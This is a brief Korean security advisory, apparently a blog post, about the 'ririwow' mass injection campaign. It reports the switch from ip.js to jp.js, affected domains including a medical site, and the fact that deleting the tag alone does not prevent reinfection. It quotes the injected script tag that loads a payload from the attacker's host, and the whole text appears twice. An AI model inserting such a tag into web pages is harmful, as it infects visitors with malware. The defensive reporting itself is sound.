# 주의사항 : 아래의 악성코드서버나 피해 사이트에 접속하면 악성코드에 감염되므로, 보안전문가가 아닌 분들은 절대 접속하지 마시기 바랍니다.
ririwow 가 머리를 좀 쓰고 있음.
hxxp://www.ririwow.cn/ip.js 가 국내외에서 신속히 detect 되자, 패턴을 바꾸었음.
<script src=hxxp://www.ririwow.cn/jp.js></script> 로 삽입하는 사례 등장 (ip.js -> jp.js 로 변경)
구글링 결과 : 1,280 개, KR 도메인 : 7 개, 미차단
http://sqler.pe.kr/web_board/view_list.asp?id=86083&read=35&pagec=&ses=1 에 들어가보면 국내 해킹 사례와 그간 일부에서 어떻게 조치했는지를 볼 수 있음.
당직진료안내라고 기록되어 있는 것으로 보아 병원 등 의료계통 사이트인 것을 알 수 있음.
피해사이트는 진료와 관련된 개인정보가 외부에 노출되지 않도록 미흡한 현재의 보안 수준을 향상시킬 필요 있음.
기타 상세한 사항은 ririwow 에 대한 이전의 분석 자료 참조
주의사항
1. DB 에 삽입된 <script src=hxxp://www.ririwow.cn/jp.js></script> 만 제거한다고 문제가 해결되지 않음.
2. 근본적인 대처방안을 수립하지 못하는 경우, 수차례에 걸쳐 재공격당함.
이글루스 가든 - professional secur...
ririwow 가 머리를 좀 쓰고 있음.
hxxp://www.ririwow.cn/ip.js 가 국내외에서 신속히 detect 되자, 패턴을 바꾸었음.
<script src=hxxp://www.ririwow.cn/jp.js></script> 로 삽입하는 사례 등장 (ip.js -> jp.js 로 변경)
구글링 결과 : 1,280 개, KR 도메인 : 7 개, 미차단
http://sqler.pe.kr/web_board/view_list.asp?id=86083&read=35&pagec=&ses=1 에 들어가보면 국내 해킹 사례와 그간 일부에서 어떻게 조치했는지를 볼 수 있음.
당직진료안내라고 기록되어 있는 것으로 보아 병원 등 의료계통 사이트인 것을 알 수 있음.
피해사이트는 진료와 관련된 개인정보가 외부에 노출되지 않도록 미흡한 현재의 보안 수준을 향상시킬 필요 있음.
기타 상세한 사항은 ririwow 에 대한 이전의 분석 자료 참조
주의사항
1. DB 에 삽입된 <script src=hxxp://www.ririwow.cn/jp.js></script> 만 제거한다고 문제가 해결되지 않음.
2. 근본적인 대처방안을 수립하지 못하는 경우, 수차례에 걸쳐 재공격당함.
이글루스 가든 - professional secur...
덧글